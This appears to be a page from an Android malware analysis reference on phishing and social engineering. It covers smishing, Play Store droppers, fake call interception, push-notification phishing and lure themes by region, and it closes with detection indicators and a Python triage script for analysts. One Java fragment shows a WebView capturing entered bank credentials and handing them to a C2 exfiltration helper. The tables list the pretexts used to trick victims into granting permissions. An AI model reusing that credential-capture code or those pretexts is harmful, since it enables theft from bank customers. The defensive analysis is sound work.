Phishing & Social Engineering
Tricking Android users into installing malware, surrendering credentials, or granting dangerous permissions. Unlike technical exploits that target software flaws, phishing targets human trust. On Android, the attack surface is broader than on desktop: SMS messages, push notifications, phone calls, QR codes, and sideloaded APKs all serve as delivery mechanisms.
See also: Call Interception, Notification Suppression, Overlay Attacks
Requirements
| Requirement | Details |
|---|---|
| Permission | Varies by technique: SEND_SMS for smishing propagation, SYSTEM_ALERT_WINDOW or BIND_ACCESSIBILITY_SERVICE for overlay phishing |
| Trigger | User interaction (tapping link, installing APK, granting permission) |
| Payload | Phishing page (HTML/WebView), fake tutorial overlay, or social engineering script |
Delivery Vectors
| Vector | Description | Reach | Example Families |
|---|---|---|---|
| Smishing (SMS) | Bulk SMS with malicious links, often spoofing sender ID | Mass | FluBot, Mamont, MoqHao |
| Play Store dropper | Benign app passes review, downloads malicious payload post-install | High trust | Anatsa, Joker, Harly |
| Fake APK sites | Cloned Play Store pages or standalone download sites hosting trojanized APKs | Targeted | GodFather, SpyNote |
| QR code phishing | Physical or digital QR codes leading to malicious download or credential page | In-person | Anatsa variants |
| Malvertising | Ad networks serving redirects to phishing or APK download pages | Mass | Vultur, Brokewell |
| Messaging apps | Malicious links spread through WhatsApp, Telegram, or other messengers | Social graph | FluBot, GriftHorse |
Smishing in Detail
SMS phishing remains the dominant initial access vector. The attacker sends a text containing a shortened URL or a domain visually similar to a trusted brand. On Android, the SMS app renders URLs as tappable links with no reputation check by default.
FluBot weaponized this into a self-propagating worm: after infecting a device, it read the victim's contact list (READ_CONTACTS) and used SEND_SMS to push smishing messages to every contact. At its peak in 2021, FluBot generated millions of SMS messages per day across Europe.
Play Store Droppers
The dropper pattern: a clean app (typically a PDF reader, QR scanner, or file manager) passes Google Play Protect review. After installation, it either downloads a second-stage APK from C2 or uses DexClassLoader to load a malicious DEX payload. Anatsa used this extensively throughout 2023-2024, with individual dropper apps reaching 100,000+ installs before removal.
Credential Capture Techniques
WebView-Based Fake Login Pages
The malware loads an attacker-controlled HTML page inside a WebView. The page mimics a banking app's login screen. Credentials entered into the form are captured through a JavaScript interface, or intercepted in shouldOverrideUrlLoading() when the form submits.
WebView Credential Interception

```java
webView.setWebViewClient(new WebViewClient() {
    @Override
    public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
        Uri uri = request.getUrl();
        String url = uri.toString();
        // The fake form submits via GET, so the credentials arrive in the query string.
        if (url.contains("login_submit")) {
            String user = uri.getQueryParameter("username");
            String pass = uri.getQueryParameter("password");
            exfilToC2(user, pass);   // malware-side helper (not shown): ships the pair to C2
            return true;             // swallow the navigation; the "login" never really happens
        }
        return false;
    }
});
```
Overlay-Based Credential Capture
A fake UI drawn on top of the real banking app. Triggered when the target app reaches the foreground. Covered in depth in Overlay Attacks.
Progressive Web App (PWA) Phishing
PWAs bypass sideloading warnings entirely
The phishing page prompts the victim to "install" a Progressive Web App. The PWA is added to the home screen with a convincing icon and name (e.g., the victim's bank). When opened, it displays a full-screen credential harvesting form. PWAs install through the browser, so none of the standard APK sideloading protections apply. This technique was observed targeting Czech and Hungarian banking customers in 2024.
Voice-Based Attacks
Fake Call Interception
Fakecalls intercepts outgoing calls to real bank phone numbers. When the victim dials their bank, Fakecalls cancels the real call and plays a pre-recorded IVR (Interactive Voice Response) that sounds identical to the bank's phone system. The fake IVR prompts the victim to enter card details via the keypad, which the malware captures.
This requires CALL_PHONE, READ_PHONE_STATE, and the ability to detect outgoing calls. Fakecalls targets Korean financial institutions.
VoIP-Routed Vishing
LetsCAll malware routes all calls through attacker-controlled VoIP infrastructure. The victim believes they are speaking with their bank, but the call is handled by a human operator working for the attacker. This combines technical interception with live social engineering, making it harder to detect than pre-recorded approaches.
Push Notification Phishing
Malware with BIND_NOTIFICATION_LISTENER_SERVICE can both read and generate push notifications. Attack pattern:
- Generate a fake push notification mimicking the victim's bank ("Suspicious transaction detected -- verify now")
- Notification tap opens a WebView credential harvesting page
- Simultaneously suppress real banking notifications to avoid contradicting the fake alert
This is effective because users inherently trust push notifications from installed apps. TrickMo and GodFather both use this technique.
Social Engineering for Permission Grants
Obtaining dangerous permissions (Accessibility, Device Admin, Notification Listener) requires convincing the victim to manually toggle settings. Common strategies:
| Technique | Implementation | Target Permission |
|---|---|---|
| Fake tutorial overlay | Step-by-step instructions drawn over Settings app | Accessibility |
| "Security update required" | Dialog claiming the OS needs an accessibility update | Accessibility |
| "Battery optimization" | Claims the app needs accessibility for battery management | Accessibility |
| "Enable notifications" | Tells user to enable notification access for "full functionality" | Notification Listener |
| "Device protection" | Prompts user to activate device admin for "anti-theft" | Device Admin |
| "Accessibility for disabled" | Poses as an assistive app that genuinely needs the permission | Accessibility |
Origin of the fake tutorial technique
Cerberus popularized the fake tutorial overlay -- it literally draws arrows and text boxes on top of the Settings screen, guiding the victim through each toggle. Most modern banking trojans have adopted variations of this technique.
Lure Themes by Region
| Theme | Regions | Example Families |
|---|---|---|
| Package delivery ("Your parcel is held") | Europe, Japan, Australia | FluBot, MoqHao |
| Bank security alert | Global | GodFather, Cerberus, Anubis |
| Tax refund / government notice | US, UK, Germany, Japan | Hydra variants |
| Crypto airdrop / wallet verification | Global | SpyAgent, SparkCat |
| Voicemail notification | Europe, US | FluBot |
| Chrome / browser update | Global | Hook, Brokewell, Vultur |
| Flash Player update | Legacy (pre-2021) | Anubis, Cerberus |
| Video player / media codec | LATAM, Southeast Asia | Gigabud, GoldPickaxe |
| Government ID / MyGov | India, Thailand, Vietnam | GoldPickaxe |
| Subscription fraud lure | Global (Play Store) | Joker, Harly |
Geographic targeting goes beyond translation. Regional campaigns match local carriers, banks, postal services, and government agencies. GodFather maintains localized phishing pages for banks across 16+ countries, dynamically selecting the inject based on device locale and installed banking apps.
Families Using This Technique
| Family | Primary Vector | Lure | Scale |
|---|---|---|---|
| FluBot | SMS worm | Package delivery / voicemail | Millions of SMS/day at peak |
| Fakecalls | Fake APK site | Banking app clone | Targeted (Korea) |
| Mamont | SMS | Delivery tracking | Russia-focused |
| GodFather | Fake APK site + dropper | Banking / crypto | 400+ targets, 16+ countries |
| Anatsa | Play Store dropper | PDF reader / cleaner | 100K+ installs per dropper |
| Hook | Malvertising | Chrome update | 400+ targets |
| Joker | Play Store dropper | Utility apps | Thousands of dropper apps |
| GriftHorse | Play Store + messenger | Prize / reward | 10M+ victims |
| MoqHao | SMS | Package delivery | Japan, South Korea |
| SpyNote | Fake APK site | Utility / banking | Targeted campaigns |
Common Phishing Flow
Typical end-to-end attack chain:
- Delivery: victim receives smishing text ("Your package could not be delivered")
- Landing page: link leads to a fake carrier site with "Download tracking app" button
- APK install: victim enables REQUEST_INSTALL_PACKAGES for the browser and installs the APK
- Permission escalation: app shows fake tutorial to enable Accessibility
- Overlay injection: malware detects banking app launch, shows overlay to capture credentials
- 2FA interception: accessibility or SMS permissions used to intercept OTP
- Account takeover: credentials + OTP sent to C2, attacker logs in from their device
Analyst Note
Each step relies on social engineering rather than technical exploitation. The weakest link is always the initial tap on a link in a text message. When analyzing a sample, trace the full chain from delivery vector through permission escalation to understand the complete attack flow.
Detection During Analysis
Static Indicators
- HTML files mimicking banking login pages in assets or downloaded to internal storage
- Hardcoded SMS message templates with URL placeholders
- BroadcastReceiver for SMS_RECEIVED or WAP_PUSH_RECEIVED
- TelephonyManager or CallScreeningService usage for call interception
- Localized string resources matching phishing lure themes
Dynamic Indicators
- Outbound SMS to numbers not in contacts (worm propagation)
- WebView loading credential-harvesting URLs
- Fake notifications generated matching banking app package names
- Calls intercepted and rerouted through VoIP endpoints
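A static-triage helper for the indicators listed above, added here as example analyst tooling (not code from the original page or from any named family or project). It walks a decoded AndroidManifest.xml plus bundled assets/resources and reports which of this page's permission, receiver and lure indicators a sample exhibits; the sample manifest and files are constructed, and the "three or more hits" review threshold is an assumption.

```python
import re
import xml.etree.ElementTree as ET
NS = "{http://schemas.android.com/apk/res/android}"
# Manifest indicators tied to the delivery and capture patterns on this page. BIND_*
# names sit on <service android:permission>, Telephony actions inside receiver filters.
INDICATORS = {
    "android.permission.SEND_SMS": "smishing propagation",
    "android.permission.READ_CONTACTS": "contact list for worm spread",
    "android.permission.SYSTEM_ALERT_WINDOW": "overlay phishing",
    "android.permission.REQUEST_INSTALL_PACKAGES": "second-stage APK dropper",
    "android.permission.BIND_ACCESSIBILITY_SERVICE": "accessibility abuse",
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE": "fake/suppressed notifications",
    "android.provider.Telephony.SMS_RECEIVED": "SMS/OTP interception",
    "android.provider.Telephony.WAP_PUSH_RECEIVED": "WAP push interception",
}
# Hardcoded smishing template: lure keyword within 80 chars of a URL or placeholder.
SMS_TEMPLATE = re.compile(r"(?is)(parcel|package|delivery|voicemail).{0,80}(%s|\{url\}|https?://)")
# Bundled HTML form with a password field: candidate fake login page.
LOGIN_FORM = re.compile(r"(?is)<form\b.*?type=[\"']password[\"']")

def scan_manifest(manifest_xml):
    """(indicator, reason) pairs found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    names = [e.get(NS + "name", "") for e in root.iter("uses-permission")]
    names += [s.get(NS + "permission", "") for s in root.iter("service")]
    names += [a.get(NS + "name", "") for a in root.iter("action")]
    return [(n, INDICATORS[n]) for n in names if n in INDICATORS]

def scan_files(files):
    """files: {path: text} for assets/ and res/ pulled from the decoded APK."""
    checks = [(LOGIN_FORM, "HTML login form (fake bank page)"), (SMS_TEMPLATE, "hardcoded smishing template")]
    return [(path, why) for path, text in files.items() for rx, why in checks if rx.search(text)]

def triage(manifest_xml, files):
    """Three or more indicators together warrant manual review of the sample (assumed threshold)."""
    hits = scan_manifest(manifest_xml) + scan_files(files)
    return {"hits": hits, "verdict": "review" if len(hits) >= 3 else "low"}

# Constructed sample modelled on the dropper + smishing chain above; not a real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
 <uses-permission android:name="android.permission.SEND_SMS"/>
 <uses-permission android:name="android.permission.READ_CONTACTS"/>
 <application><receiver android:name=".SmsRx"><intent-filter>
  <action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter></receiver>
 <service android:name=".A11y" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
 </application></manifest>"""
SAMPLE_FILES = {
    "assets/login.html": '<form action="login_submit"><input name="username"><input type="password" name="password"></form>',
    "res/values/strings.xml": '<string name="tpl">Your parcel could not be delivered, track it: %s</string>',
}
```

Run it against the output of apktool or a similar decoder; a single SEND_SMS hit on a messaging app is normal, so weigh the combination of indicators rather than any one line.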